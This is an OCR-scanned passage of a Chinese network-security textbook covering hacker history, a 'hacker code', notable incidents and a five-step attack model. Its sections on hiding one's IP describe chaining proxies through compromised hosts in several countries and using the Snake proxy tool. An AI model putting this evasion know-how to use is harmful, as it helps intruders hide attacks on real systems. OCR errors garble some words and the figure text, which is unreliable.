入 侵 行 为 ,发 现 人 侵 行为 的 规律 ,这 样 防火 墙 就 可 以 将 这 些 规律 加 入 规则 之 中 ,提高 防火 墙 
的 防护 力度 。 


习 题 


一 、 填空 题 
1. 常见 的 防火 墙 有 三 种 类 型 ; 、 
2. 创建 一 个 防火 墙 系统 一 般 需 要 6 步 : 


3. 常见 的 防火 墙 系 统一 般 按照 4 种 模型 构建 : 


4. 人 侵 检测 的 三 个 基本 步骤 是 

5. 人 入 侵 检测 系统 分 为 

二 、 简 答题 

1. 简 述 防火 墙 的 分 类 ,并 说 明 分 组 过 滤 防 火 墙 的 基本 原理 。 

2. 常见 防火 墙 模型 有 哪些 ? 比较 它们 的 优 缺 点 。 

3. 什么 是 入 侵 检 测 系统 ? 简 述 入 侵 检测 系统 目前 面临 的 挑战 。 
A. 简 述 入 侵 检测 常用 的 方法 。 


第 3 部 分 ”网络 安全 攻击 技术 


第 6 章 黑客 与 攻击 方法 


学 习 目 标 : 
m 掌握 主动 扫描 和 被 动 扫描 ,以 及 相应 工具 的 使 用 。 
n 了 解 黑 客 的 定义 以 及 相关 的 事件 。 


6.1 黑客 概述 


6.1.1 黑客 的 起 源 


一 般 认为 ,黑客 起 源 于 20 世纪 50 年 代 麻 省 理工 学 院 的 实验 室 中 ,他 们 精力 充沛 ,热衷 
于 解决 难题 。20 世纪 60,70 EAR, “黑客 "一 词 极 富 襄 义 ,用 于 指 代 那 些 独 立 思 考 ,奉公 守法 
的 计算 机 迷 ,他 们 智力 超群 ,对 计算 机 全 身心 投入 ,从 事 黑客 活动 意味 着 对 计算 机 的 最 大 潜 
力 进 行 智力 上 的 自由 探索 ,为 计算 机 技术 的 发 展 做 出 了 巨大 贡献 。 正 是 这 些 黑客 ,倡导 了 一 
场 个 人 计算 机 革命 ,倡导 了 现行 的 计算 机 开放 式 体系 结构 ,打破 了 以 往 计算 机 技术 只 掌握 在 
少数 人 手 里 的 局 面 ,开创 了 个 人 计算 机 的 先河 ,提出 了 “计算 机 为 人 民 所 用 ”的 观点 。 现 在 黑 
客 使 用 的 侵入 计算 机 系统 的 基本 技巧 ,例如 破解 口令 , 开 天 窗 ,走后门 ,安放 特洛伊 木马 等 ， 
都 是 在 这 一 时 期 发 明 的 。 从 事 黑客 活动 的 经 历 , 成 为 后 来 许多 计算 机 业 巨 子 简历 上 不 可 或 
缺 的 一 部 分 。 例 如 ,苹果 公司 创始 人 之 一 乔布斯 就 是 一 个 典型 的 例子 。 

在 20 世纪 60 年 代 , 计 算 机 的 使 用 还 远 未 普及 ,还 没有 多 少 存储 重要 信息 的 数据 库 , 也 
谈 不 上 黑客 对 数据 的 非法 复制 等 问题 。 到 了 20 世纪 80、90 年 代 , 计 算 机 越 来 越 重 要 ,大 型 
数据 库 也 越 来 越 多 ,同时 ,信息 越 来 越 集中 在 少数 人 的 手 里 。 这 样 一 场 新 时 期 的 * 圈 地 运动 ” 
引起 了 黑客 们 的 极 大 反感 。 黑 客 认为 ,信息 应 共享 而 不 应 被 少数 人 所 垄断 ,于 是 将 注意 力 转 
移 到 涉及 各 种 机 密 的 信息 数据 库 上 。 而 这 时 ,计算 机 空间 已 私有 化 ,成 为 个 人 拥有 的 财产 ， 
社会 不 能 青 对 黑客 行为 放任 不 管 ,而 必须 采取 行动 ,利用 法 律 等 手段 来 进行 控制 。 黑 客 活动 
受到 了 空前 的 打击 。 

但 是 ,政府 和 公司 的 管理 者 现在 越 来 越 多 地 要 求 黑客 传授 给 他 们 有 关 计 算 机 安全 的 知 
识 。 许 多 公司 和 政府 机 构 已 经 邀请 黑客 为 他 们 检验 系统 的 安全 性 ,甚至 还 请 他 们 设计 新 的 
保安 规程 。 在 两 名 黑客 连续 发 现 网 景 公司 设计 的 信用 卡 购物 程序 的 缺陷 并 向 商界 发 出 公告 
之 后 ,网 景 修正 了 缺陷 并 宣布 举办 名 为 “网 景 缺陷 大 奖 赛 "的 竞赛 ,那些 发 现 和 找到 该 公司 产 
品 中 安全 漏洞 的 黑客 可 获 1000 美元 奖金 。 无 疑 黑客 正在 对 计算 机 防护 技术 的 发 展 做 出 
贡献 。 

显然 “黑客 "一 词 原来 并 没有 丝毫 的 贬义 成 分 。 直 到 后 来 ,少数 怀 有 不 良 企图 ,利用 非 
法 手段 获得 的 系统 访问 权 去 冯 和 人 远程 机 器 系统 、 破 坏 重 要 数据 ,或 为 了 自己 的 私利 而 制造 麻 
烦 的 具有 恶意 行为 特征 的 人 , 慢 慢 焉 污 了 “黑客 ”的 名 声 ,“ 黑 客 " 才 逐渐 演变 成 入侵 者 、 破 坏 
者 的 代名词 。 
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到 了 今天 ,“ 黑 客 "一 词 已 被 用 于 泛 指 那些 专门 利用 计算 机 搞 破 坏 或 恶作剧 的 家 伙 。 对 
这 些 人 的 正确 英文 叫 法 是 Cracker, 有 人 翻译 成 “ 骇 客 ”, 就 是 “破解 者 ”的 意思 。 这 些 人 做 的 
事情 更 多 的 是 破解 商业 软件 .恶意 入 侵 别 人 的 网 站 并 造成 损失 。 


6.1.2 定义 


(1) 黑客 : 是 “Hacker” 的 音译 , 源 于 动词 Hack ,其 引申 意义 是 指 “ 干 了 一 件 非 常 漂亮 的 
事 ”。 这 里 说 的 黑客 是 指 那些 精 于 某 方面 技术 的 人 。 对 于 计算 机 而 言 , 黑 客 就 是 精通 网 络 、 
系统 、 外 设 以 及 软 硬 件 技术 的 人 。 黑 客 所 做 的 不 是 恶意 破坏 ,他 们 是 一 群 纵横 于 网 络 上 的 技 
术 人 员 ,热衷 于 科技 探索 、 计 算 机 科学 研究 。 在 黑客 圈 中 ,Hacker 一 词 无 疑 带 有 正面 的 意 
义 , 例 如 ,System Hacker 熟悉 操作 的 设计 与 维护 ; Password Hacker 精 于 找 出 使 用 者 的 密 
码 , 若 是 Computer Hacker 则 是 通晓 计算 机 ,进入 他 人 计算 机 操作 系统 的 高 手 ,早期 在 美国 
的 计算 机 界 是 带 有 蛮 义 的 。 

(2) 骇 客 : 有 些 黑客 逾越 尺度 ,运用 自己 的 知识 去 做 出 有 损 他 人 权益 的 事情 ,就 称 这 种 
人 为 骇 客 (Cracker, 破 坏 者 )。 与 黑客 近 义 ,其实 黑客 与 骇 客 本 质 上 都 是 相同 的 , 奖 入 计算 机 
系统 /软件 者 。 黑 客 和 骇 客 并 没有 一 个 十 分 明显 的 界限 ,但 随 着 两 者 含义 越 来 越 模糊 ,公众 
对 待 两 者 的 含义 已 经 显得 不 那么 重要 了 。 

根据 开放 源 代码 的 创始 人 埃 里 克 … S， 雷 蒙 德 对 两 者 的 解释 是 :“ 黑 客 ”与 “ 骇 客 ”是 分 
属 两 个 不 同 世界 的 族群 ,基本 差异 在 于 ,黑客 搞 建 设 , 骇 客 搞 破坏 。 

O 红 客 : 维护 国家 利益 代表 人 民意 志 , 他 们 热爱 自己 的 祖国 .民族 、 和 平 ,极力 地 维护 
国家 安全 与 尊严 。 

CD 蓝 客 : 信仰 自由 ,提倡 爱国 主义 的 黑客 们 ,用 自己 的 力量 来 维护 网 络 的 和 平 。 


6.1.3 黑客 守则 


任何 职业 都 有 相关 的 职业 道德 ,一 名 黑客 同样 有 职业 道德 ,一 些 守 则 是 必须 遵守 的 ,不 
然 会 给 自己 招来 麻烦 。 归 纳 起 来 就 是 “黑客 14 条 守则 ”。 

COD 不 要 恶意 破坏 任何 的 系统 ,这 样 做 只 会 给 你 带 来 麻烦 。 他 们 恪守 这 样 一 条 准则 : 
“Never damage any system”( 永 不 破坏 任何 系统 )。 

(2) 不 要 破坏 别人 的 软件 和 资料 。 

(3) 不 要 修改 任何 系统 文件 ,如 果 是 因为 进入 系统 的 需要 而 修改 了 系统 文件 ,请 在 目的 
达到 后 将 它 改 回 原状 。 

(4) 不 要 轻易 地 将 你 要 黑 的 或 者 黑 过 的 站 点 告诉 你 不 信任 的 朋友 。 

O) 在 发 表 黑 客 文 章 时 不 要 用 你 的 真实 名 字 。 

(6) 正在 入 侵 的 时 候 , 不 要 随意 离开 你 的 计算 机 。 

(7) 不 要 入 侵 或 破坏 政府 机 关 的 主机 。 

(8) 将 你 的 笔记 放 在 安全 的 地 方 。 

(9) 已 侵入 的 计算 机 中 的 账号 不 得 清除 或 修改 。 

(10) 可 以 为 隐藏 自己 的 侵入 而 做 一 些 修 改 , 但 要 尽量 保持 原 系统 的 安全 性 ,不 能 因为 
得 到 系统 的 控制 权 而 将 门户 大 开 。 

(11) 不 要 做 一 些 无 聊 .单调 并 且 愚 蠢 的 重复 性 工作 。 
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(12) 做 真正 的 黑客 , 读 遍 所 有 有 关系 统 安全 或 系统 漏洞 的 书 。 

(13) 不 在 电话 中 谈论 关于 你 Hack 的 任何 事情 。 

(14) 不 将 你 已 破解 的 账号 与 你 的 朋友 分 享 。 
6.1.4. 黑客 精神 

成 为 一 名 好 的 黑客 ,需要 具备 4 种 基本 素质 :“Free” 精 神 、 探 索 与 创新 精神 、 反 传统 精 
神 和 合作 精神 。 

1. Free( 自 由 、 免 费 ) 的 精神 

需要 在 网 络 上 和 本 国 以 及 国际 上 一 些 高 手 进 行 广 泛 的 交流 ,并 有 一 种 奉献 精神 ,将 自己 
的 心得 和 编写 的 工具 和 其 他 黑客 共享 。 

2. 探索 与 创新 的 精神 

所 有 的 黑客 都 是 喜欢 探索 软件 程序 奥秘 的 人 。 他 们 探索 程序 与 系统 的 漏洞 ,在 发 现 问 
题 的 同时 会 提出 解决 问题 的 方法 。 

3. 反 传 统 的 精神 

找 出 系统 漏洞 ,并 策划 相关 的 手段 利用 该 漏洞 进行 攻击 ,这 是 黑客 永恒 的 工作 主题 ,而 
所 有 的 系统 在 没有 发 现 漏洞 之 前 ,都 号 称 是 安全 的 。 

4. 合作 的 精神 

成 功 的 一 次 入 侵 和 攻击 ,在 目前 的 形式 下 , 单 靠 一 个 人 的 力量 已 经 没有 办 法 完成 了 ,通常 
需要 数 人 、 数 百人 的 通力 协作 才能 完成 任务 ,互联 网 提供 了 不 同 国家 黑客 交流 合作 的 平台 。 


6.1.5 代表 人 物 


1. Kevin Mitnick 

凯 文 。 米 特 尼克 (Kevin David Mitnick,1964 年 美国 洛杉矶 出 生 ), 有 评论 称 他 为 世界 
上 ”头号 计算 机 骇 客 ”。 这 位 著名 人 物 现 年 不 过 五 十 几 岁 ,但 其 传奇 的 黑客 经 历 足以 令 全 世 
界 为 之 震惊 。 

2. Adrian Lamo 

艾 德 里 安 。 拉 莫 , 历 史上 5 大 最 著名 的 黑客 之 一 。Lamo 专门 找 大 的 组 织 下 手 , 例 如 破 
解 进入 微软 和 《纽约 时 报 》。Lamo 喜欢 使 用 咖啡 店 、.Kinko 店 或 者 图 书馆 的 网 络 来 进行 他 
的 黑客 行为 ,因此 得 了 一 个 诺 号 : 不 回 家 的 黑客 。Lamo 经 常 发 现 安 全 漏洞 ,并 加 以 利用 。 
通常 他 会 告知 企业 相关 的 漏洞 。 

3. Jonathan James 

乔纳森 詹姆斯 ,历史 上 5 大 最 著名 的 黑客 之 一 。16 岁 的 时 候 James 就 已 经 恶名 远 
播 : 因 为 他 成 为 第 一 个 因为 黑客 行径 被 捕 和 人 狱 的 未 成 年 人 。 

4. Robert Tappan Morrisgeek 

Robert Tappan Morrisgeek 也 是 美国 历史 上 5 大 最 著名 的 黑客 之 一 。Morris 的 父亲 是 
前 美国 国家 安全 局 的 一 名 科学 家 Robert Morris. Robert 是 Morris 蠕虫 病毒 的 创造 者 ,这 
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一 病毒 被 认为 是 首 个 通过 互联 网 传播 的 蠕虫 病毒 。 也 正 是 如 此 ,他 成 为 首 个 被 以 1986 年 计 
算 机 欺骗 和 滥用 法 案 起 诉 的 人 。 


6.1.6 主要 成 就 


Richard Stallman: 传统 型 大 黑客 ,在 1971 年 受聘 成 为 美国 麻 省 理工 学 院 人 工 智能 实 
验 室 程序 员 。 

Ken Thompson 和 Dennis Ritchie; 贝尔 实验 室 的 计算 机 科学 操作 组 程序 员 。 两 人 在 
1969 年 发 明了 UNIX 操作 系统 。 

John Draper EE jt K . Captain Crunch 闻名 ): 发 明了 用 一 个 塑料 哨子 打 免费 电话 。 

Mark Abene( 以 Phiber Optik 而 闻名 ): 鼓舞 了 全 美 无 数 青 少年 "学习 ”美国 内 部 电话 


系统 是 如 何 运 作 的 。 
Robert Morris; 康 奈 尔 大 学 毕业 生 ,在 1988 年 散布 了 第 一 只 互联 网 病毒 “蠕虫 ”。 
6.1.7 相关 事件 


1983 年 , 凯 文 。 米 特 尼 克 因 被 发 现 使 用 一 台大 学 里 的 计算 机 擅自 进入 今日 互联 网 的 前 
身 ARPA 网 ,并 通过 该 网 进入 了 美国 五 角 大 楼 的 计算 机 ,而 被 判 在 加 州 的 青年 管教 所 管教 
了 6 个 月 。 

1988 年 , 凯 文 。 米 特 尼 克 被 执法 当局 逮捕 ,原因 是 : DEC 指控 他 从 公司 网 络 上 盗 取 了 
价值 100 万 美元 的 软件 ,并 造成 了 400 万 美元 损失 。 

1993 年 ,自称 为 “骗局 大 师 ” 的 组 织 将 目标 锁定 美国 电话 系统 ,这 个 组 织 成 功 人 侵 美 国 
国家 安全 局 和 美利坚 银行 ,他 们 建立 了 一 个 能 绕 过 长 途 电话 呼叫 系统 而 侵入 专线 的 系统 。 

1995 年 ,来 自 俄罗斯 的 黑客 弗 拉 季 米 尔 ， 列宁 在 互联 网 上 上 演 了 精彩 的 偷 天 换 日 ,他 
是 历史 上 第 一 个 通过 入 侵 银行 计算 机 系统 来 获 利 的 黑客 。1995 年 ,他 侵入 美国 花旗 银行 并 
HÆ 1000 万 。 他 于 1995 年 在 英国 被 国际 刑警 逮捕 ,之 后 ,他 把 账户 里 的 钱 转移 至 美国 、 芬 
兰 ,荷兰 ,德国 爱尔兰 等 地 。 

1999 年 , 梅 利 莎 病毒 (Melissa) 使 世界 上 300 多 家 公司 的 计算 机 系统 崩溃 ,该 病毒 造成 
的 损失 接近 4 亿美 金 , 它 是 首 个 具有 全 球 破坏 力 的 病毒 .该 病毒 的 编写 者 戴 维 。 斯 密斯 在 编 
写 此 病毒 的 时 候 年 仅 30 岁 。 戴 维 ， 斯 密斯 也 因此 被 判处 5 年 徒刑 。 

2000 年 ,年 仅 15 岁 ,绰号 “黑手 党 男孩 ”的 黑客 在 2000 年 2 月 6 日 到 2 月 14 日 情人 节 
期 间 成 功 侵入 包括 雅虎 .eBay 和 Amazon 在 内 的 大 型 网 站 服务 器 ,他 成 功 阻止 服务 器 向 用 
户 提 供 服务 ,于 2000 年 被 捕 。 

2000 年 ,日 本 右 辟 势 力 在 大 阪 集会 , 称 南京 大 屠杀 是 “20 世纪 最 大 谎言 ”, 公 然 为 南京 大 
屠杀 翻案 。 在 中 国政 府 和 南京 等 地 的 人 民 抗 议 的 同时 ,内 地 网 虫 和 海外 华人 黑客 多 次 进攻 
日 本 网 站 ,用 实际 行动 回击 日 本 右翼 的 丑行 , 据 日 本 媒体 报道 ,日 本 总 务 厅 和 科技 厅 的 网 站 
被 迫 关闭 ,日 本 政要 对 袭击 浪潮 表示 遗憾 。 

2007 年 ,俄罗斯 黑客 成 功 动 持 Windows Update 下 载 器 。 根 据 Symantec 研究 人 员 的 
消息 ,他 们 发 现 已 经 有 黑客 动 持 了 BITS, 可 以 自由 控制 用 户 下 载 更 新 的 内 容 , 而 BITS 是 完 
全 被 操作 系统 安全 机 制 信任 的 服务 , 连 防火 墙 都 没有 任何 警觉 。 这 意味 着 利用 BITS, 黑 客 
可 以 很 轻松 地 把 恶意 内 容 以 合法 的 手段 下 载 到 用 户 的 计算 机 并 执行 。Symantec 的 研究 人 
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员 同 时 也 表示 ,他们 发 现 的 黑客 正在 尝试 劫持 ,但 并 没有 将 恶意 代码 写 入 ,也 没有 准备 好 提 
供给 用 户 的 “ 货 ", 但 提醒 用 户 要 提高 警觉 。 

2008 年 ,一 个 全 球 性 的 黑客 组 织 , 利 用 ATM 欺诈 程序 在 一 夜 之 间 从 世界 49 个 城市 的 
银行 中 盗 走 了 900 万 美元 。 黑 客 们 攻破 的 是 一 种 名 为 RBS WorldPay 的 银行 系统 ,用 各 种 
奇 技 淫 巧 取得 了 数据 库 内 的 银行 卡 信息 ,并 在 11 月 8 日 午夜 ,利用 团伙 作案 从 世界 49 个 城 
市 总 计 超 过 130 ff ATM 机 上 提取 了 900 万 美元 。 最 关键 的 是 ,目前 FBI 还 未 破案 ,甚至 据 
说 连 一 个 嫌疑 人 都 没 找到 。 

2009 年 7 月 7 日 ,韩国 遭受 有 史 以 来 最 猛烈 的 一 次 攻击 。 韩 国 总 统 府 、 国 会 .国情 院 和 
国防 部 等 国家 机 关 , 以 及 金融 界 、 媒 体 和 防火 墙 企业 网 站 遭遇 了 攻击 。9 日 韩国 国家 情报 院 
和 国民 银行 网 站 无 法 被 访问 。 韩 国 国会 .国防 部 、 外 交通 商 部 等 机 构 的 网 站 一 度 无 法 打开 。 
这 是 韩国 遭遇 的 有 史 以 来 最 强 的 一 次 黑客 攻击 。 

2010 年 1 月 12 日 上 午 7 点 钟 开始 ,全 球 最 大 中 文 搜索 引擎 “百度 ” 遭 到 黑客 攻击 ,长 时 
间 无 法 正常 访问 。 主 要 表现 为 跳 转 到 一 雅虎 出 错 页 面 . 伊 朗 网 军 图 片 ,出 现 *“ 天 外 符号 ”等 ， 
范围 涉及 四 川 ` 福 建 . 江 苏 \ 吉 林 、 浙 江 \ 北 京 .广东 等 国内 绝 大 部 分 省 市 。 这 次 攻击 百度 的 黑 
客 疑 似 来 自 境 外 ,利用 了 DNS 记录 自 改 的 方式 。 这 是 自 百度 建立 以 来 ,所 遭遇 的 持续 时 间 
最 长 ,影响 最 严重 的 黑客 攻击 。 网 民 访问 百度 时 ,会 被 定向 到 一 个 位 于 荷兰 的 IP 地 址 ,百度 
旗下 所 有 子 域名 均 无 法 正常 访问 。 

2012 年 9 月 14 日 ,中 国 黑 客 成 功 人 侵 日 本 最 高 法 院 官方 网 站 ,并 在 其 网 站 上 发 布 了 有 
关 钓 鱼 岛 的 图 片 和 文字 ,该 网 站 一 度 无 法 访问 。 

2013 4Æ 3 H 11 日 ,国家 互联 网 应 急 中 心 (CNCERT) 的 最 新 数据 显示 ,中 国 遭 受 境 外 网 
络 攻击 的 情况 日 趋 严重 。CNCERT 抽样 监测 发 现 ,2013 年 1 月 1 日 至 2 月 28 日 不 足 60 天 
的 时 间 里 ,境外 6 747 台 木 马 或 僵尸 网 络 控制 服务 器 控制 了 中 国境 内 190 万 余 台 主机 ; 其 中 
位 于 美国 的 2 194 台 控 制服 务 器 控制 了 中 国境 内 128. 7 万 台 主 机 ,无 论 是 按照 控制 服务 器 
数量 还 是 按照 控制 中 国 主机 数量 排名 ,美国 都 名 列 第 一 。 


6.2 黑客 攻击 5 部 曲 


黑客 攻击 和 网 络 安全 是 紧密 结合 在 一 起 的 ,研究 网 络 安全 不 研究 黑客 攻击 技术 简直 是 
纸上谈兵 ,研究 攻击 技术 不 研究 网 络 安全 就 是 闭门造车 。 

某 种 意义 上 说 没有 攻击 就 没有 安全 ,系统 管理 员 可 以 利用 常见 的 攻击 手段 对 系统 进行 
检测 ,并 对 相关 的 漏洞 采取 措施 。 

网 络 攻击 有 善意 也 有 恶意 的 ,善意 的 攻击 可 以 帮助 系统 管理 员 检 查 系 统 漏洞 ,恶意 的 攻 
击 可 以 包括 : 为 了 私人 恩怨 、 为 了 商业 或 个 人 目的 获得 秘密 资料 、 民 族 仇恨 、 利 用 对 方 的 系 
统 资源 满足 自己 的 需求 .寻求 刺激 、 给 别人 帮忙 以 及 一 些 无 目的 攻击 o 

一 次 成 功 的 攻击 ,都 可 以 归纳 成 基本 的 5 个 步骤 ,但 是 根据 实际 情况 可 以 随时 调整 , 归 
纳 起 来 就 是 “黑客 攻击 5 部 曲 ”。 

(1) 隐藏 IP; 

(2) 踩点 扫描 ; 
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(3) 获得 系统 或 管理 员 权限 
(4) 种 植 后 门 ; 
(5) 在 网 络 中 隐身 。 


6.3 [à jk IP 


6.3.1 隐藏 IP 的 方法 


隐藏 真实 IP 的 方法 有 三 种 。 

CD 最 简单 的 方法 就 是 使 用 代理 服务 器 。 与 直接 连接 到 Internet 相 比 ,使 用 代理 服务 
器 能 保护 上 网 用 户 的 IP 地 址 ,从 而 保障 上 网 安全 。 代 理 服务 器 的 原理 是 在 客户 机 和 远程 服 
务 器 之 间架 设 一 个 “中 转 站 ”, 当 客 户 机 向 远程 服务 器 提出 服务 要 求 后 ,代理 服务 器 首先 截取 
用 户 的 请 求 , 然 后 代理 服务 器 将 服务 请 求 转交 远程 服务 器 ,从 而 实现 客户 机 和 远程 服务 器 之 
间 的 联系 。 很 显然 ,使 用 代理 服务 器 后 远 端 服 务 器 包括 其 他 用 户 只 能 探测 到 代理 服务 器 的 
IP 地 址 而 不 是 用 户 的 IP 地 址 ,这 就 实现 了 隐藏 用 户 IP 地 址 的 目的 ,保障 了 用 户 上 网 安全 。 
而 且 , 这 样 还 有 一 个 好 处 , 那 就 是 如 果 有 许多 用 户 共用 一 个 代理 器 时 , 当 有 人 访问 过 某 一 站 点 
后 ,所 访问 的 内 容 便 会 保存 在 代理 服务 器 的 硬盘 上 ,如 果 再 有 人 访问 该 站 点 ,这 些 内 容 便 会 直 
接 从 代理 服务 器 中 获取 ,而 不 必 再 次 连接 远 端 服务 器 ,因此 可 以 节约 带宽 ,提高 访问 速度 。 

找到 免费 代理 服务 器 后 ,就 可 以 使 用 它 了 。 以 IE 浏览 器 为 例 ,运行 IE, Gd" RA 
"Internet 选项 ”, 在 弹出 的 “Internet 选项 ”对 话 框 中 选择 “连接 ”选项 卡 , 青 单 击 “ 局 域 网 设 
置 ?按钮 ,如 图 6-1 所 示 。 在 弹出 的 对 话 框 中 把 “为 LAN 使 用 代理 服务 器 ”前 面 的 框 勾 选 上 ， 
然后 在 地址 ”和 "端口 ” 栏 中 填 入 找到 的 代理 服务 器 IP 和 所 用 端口 即 可 ,如 图 6-2 所 示 。 同 

Internet 选项 

an | 安全 [eu [ne [$9 [程序 [ea | 
ip FERT nereta, essem CREO 


撕 号 和 虚拟 专用 网 络 设置 


局 域 网 (LAN) 设 置 


自动 配置 
目 动 配置 会 办 闫 手动 设置 。 要 确保 使 用 手动 设置 ,请 禁用 自动 配置 。 


如 果 要 为 连接 配置 代理 服务 器 ， 请 选择 "设置 


局 域 网 LAN) 设 置 


LAN ECT EIRISIHR STER. NTAS 
su ERO E EHI. 


Lwe JL omm 


61 代理 服务 器 的 设置 步骤 1 图 6-2 代理 服务 器 的 设置 步骤 2 
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时 在 “高 级 ”设置 中 还 可 以 对 不 同 的 服务 器 ,例如 HTTP, FTP 设 定 不 同 的 代理 服务 器 地 址 
和 端口 。 这 样 一 来 , 当 再 访问 那些 网 页 时 ,页 面 上 显示 的 就 不 再 是 真实 IP 了 。 

(2) 隐藏 IP 的 另外 一 个 方法 是 利用 受 控 于 计算 机 上 的 木马 (也 就 是 利用 肉鸡 )。 利 用 
这 人 台 计 算 机 进行 攻击 ,这样 即 使 被 发 现 了 ,也 是 “肉鸡 ”的 IP 地 址 。 

现在 就 可 以 小 小 地 * 隐 身 ” 一 把 了 ,但 还 不 够 彻底 ,要 想 * 隐 形 还 必须 隐藏 计算 机 名 
和 工作 组 。 因 为 网 上 有 许多 黑客 软件 可 以 查 出 计算 机 名 和 工作 组 ,他 们 主要 是 通过 搜索 
网 上 是 否 存在 使 用 NetBIOS 协议 的 用 户 , 来 探测 其 机 器 名 称 、IP 地 址 等 信息 ,并 借 此 来 
攻击 


在 Internet 上 ,NetBIOS 开放 就 和 一 个 后 门 程序 差不多 。 因 为 在 安装 TCP/IP 协议 时 ， 
NetBIOS 也 被 Windows 作为 默认 设置 载 入 了 计算 机 ,而 计算 机 随即 也 具有 了 NetBIOS 本 
身 的 开放 性 。 换 句 话 讲 , 在 不 知 不 觉 间 ,计算 机 已 被 打开 了 一 个 危险 的 “后 门 ”。 这 个 后 门 可 
以 泄漏 信息 : 计算 机 名 和 工作 组 。 事 实 上 ,有 许多 人 会 用 自己 的 真实 姓名 作 计 算 机 名 称 , 还 
有 自己 的 单位 名 字 作为 工作 组 ,这 样 很 容易 根据 某 个 人 的 固定 信息 找到 某 个 人 的 IP 地 址 。 
而 网 上 针对 IP 地 址 的 攻击 手段 和 工具 实在 是 太 多 了 ,这 是 很 危险 的 ,因此 ,如 果 是 一 个 单机 
用 户 那么 完全 可 以 禁止 NetBIOS 服务 ,从 而 堵 上 这 个 危险 的 漏洞 ,对 于 Windows 2000 或 者 
Windows XP 用 户 , 先 右 击 “ 网 络 邻 居 ”, 选 择 “ 属 性 ”, 进 入 “网 络 和 拨号 连接 ”, 再 右 击 “本 地 
连接 ”, 选 择 “ 属 性 ”, 进 入 “本 地 连接 属性 ”。 双 击 “Internet 协议 (TCP/IP)” 后 , 单 击 “ 高 级 ”， 
选择 “选项 ”条 中 的 “TCP/IP 筛选 ,在 “只 允许 ?中 填 和 人 除了 139 之 外 要 用 到 的 端口 ,如 图 6-3 
所 示 。 


v] BRI TCP/IP jii [所 有 适配器 ) Œ) 
Ost Omt w 回 全 部 允许 加 ) 
Qaira 只 从 许 ORRU 
添加 第 选 器 7 rø | 
Bm... 添加 
mo mO 


6-3 TCP/IP 筛选 


(3) 使 用 工具 软件 (IP 隐藏 工具 Hide IP Easy), Hide IP Easy 是 一 款 隐 藏 真实 IP 的 
实用 工具 ,可 以 帮助 用 户 轻松 隐藏 真实 IP, 防 止 网 上 活动 被 监视 或 个 人 信息 被 黑客 窃取 , 采 
用 的 是 高 度 匿 名 代理 。 它 通过 更 改 IP 地 址 ,使 服务 器 端 看 起 来 就 像 有 个 真正 的 客户 浏览 器 
在 访问 它 。 而 在 浏览 的 过 程 中 ,真实 IP 是 隐藏 起 来 的 ,服务 器 的 网 管 不 会 认为 你 使 用 了 代 
理 , 谁 也 不 知道 你 用 了 代理 。 但 是 需要 注意 的 是 , Hide IP Easy 必须 与 IE, Firefox, Opera 
等 浏览 器 配合 使 用 , 它 不 支持 Netscape 等 浏览 器 和 其 他 网 站 应 用 ,对 于 QQ 等 通信 软件 则 
无 法 进行 IP 代理 ,具体 使 用 见 实 验 13。 
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本 软件 仅 适用 TE 浏览 器 隐藏 IP 址 ,其 他 非 IE 内 核 浏 览 器 无 效 , 即 只 有 使 用 IE 内 核 浏 
览 器 才能 隐藏 真实 IP, 主 要 特点 : 匿名 网 络 冲浪 和 保护 身份 。 


6.3.2 隐藏 IP 的 实例 


1. 网 络 代理 跳板 

当 从 本 地 人 侵 其 他 主机 的 时 候 ,自己 的 IP 会 暴露 给 对 方 。 通 过 将 某 一 台 主 机 设置 为 代 
理 , 通 过 该 主机 再 人 侵 其 他 主机 ,这 样 就 会 留 下 代理 的 TP 地 址 ,这 样 就 可 以 有 效 地 保护 自己 
的 安全 。 二 级 代理 的 基本 结构 如 图 6-4 所 示 。 


P EE] 


本 地 计算 机 


代理 服务 器 一 代理 服务 器 二 ”被 入 侵 的 主机 
图 6-4 网 络 代理 跳板 结构 


本 地 通过 两 级 代理 人 侵 某 一 台 主 机 ,这 样 在 被 人 侵 的 主机 上 ,就 不 会 留 下 自己 的 信 
息 。 可 以 选择 更 多 的 代理 级 别 , 但 是 考虑 到 网 络 带 宽 的 问题 ,一 般 选择 两 到 三 级 代理 比 
较 合 适 。 

选择 代理 服务 的 原则 是 选择 不 同 地 区 的 主机 作为 代理 。 比 如 现在 要 入 侵 北美 的 某 一 台 
主机 ,选择 南非 的 某 一 台 主 机 作为 一 级 代理 服务 器 ,选择 北欧 的 某 一 台 计 算 机 作为 二 级 代 
理 , 再 选择 南美 的 一 台 主 机 作为 三 级 代理 服务 器 ,这 样 就 很 安全 了 。 

可 以 选择 作 代理 的 主机 有 一 个 先决 条 件 ,必须 先 安装 相关 的 代理 软件 ,一 般 都 是 将 已 经 
被 人 侵 的 主机 作为 代理 服务 器 。 

2. 网 络 代理 跳板 工具 的 使 用 

常用 的 网 络 代理 跳板 工具 很 多 ,这 里 介绍 一 种 比较 常用 而 且 功 能 比较 强大 的 代理 
工具 : Snake 代理 跳板 。Snake 代理 跳板 ,支持 TCP/UDP 代理 ,支持 多 个 (最 多 达到 
255) 跳 板 。 程 序 文 件 为 SkSockServer. exe. 代理 方式 为 Sock5, 并 自动 打开 默认 端口 
1813 监听 。 

使 用 Snake 代理 跳板 需要 首先 在 每 一 级 跳板 主机 上 安装 Snake 代理 服务 器 。 程 序 文件 
是 SkSockServer. exe, 将 该 文件 复制 到 目标 主机 上 。 具 体 使 用 见 实 验 14。 


6.4 踩点 (信息 收集 ) 扫 描 


信息 收集 是 指 通 过 各 种 途径 、 各 种 方式 对 所 要 攻击 的 目标 进行 多 方面 的 了 解 , 获 取 所 需 
要 的 信息 。 信 息 收 集 是 信息 得 以 利用 的 第 一 步 ,也 是 关键 的 一 步 , 收 集 任何 可 得 到 的 蛛 丝 马 
迹 , 但 要 确保 信息 的 准确 ,信息 收集 工作 的 好 坏 ,直接 关系 到 入 侵 与 防御 的 成 功 与 否 ,收集 的 
主要 信息 包括 域名 \IP 地 址 、 操 作 系 统 、 主 机 类 型 漏洞 情况 、 开 放 端 口 、 账 户 密码 、 网 页 、 邮 
箱 、 公 司 性 质 等 。 
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6.4.1 信息 收集 的 原则 


为 了 保证 信息 收集 的 质量 ,应 坚持 以 下 原则 。 

(1) 准确 性 原则 : 该 原则 要 求 所 收集 到 的 信息 要 真实 ,可 靠 。 这 是 最 基本 的 要 求 。 

(2) 全 面 性 原则 : 该 原则 要 求 所 搜集 到 的 信息 要 广泛 ,全面 完 整 。 

(3) 时 效 性 原则 : 信息 的 利用 价值 取决 于 该 信息 是 否 能 及 时 地 提供 , 即 它 的 时 效 性 。 
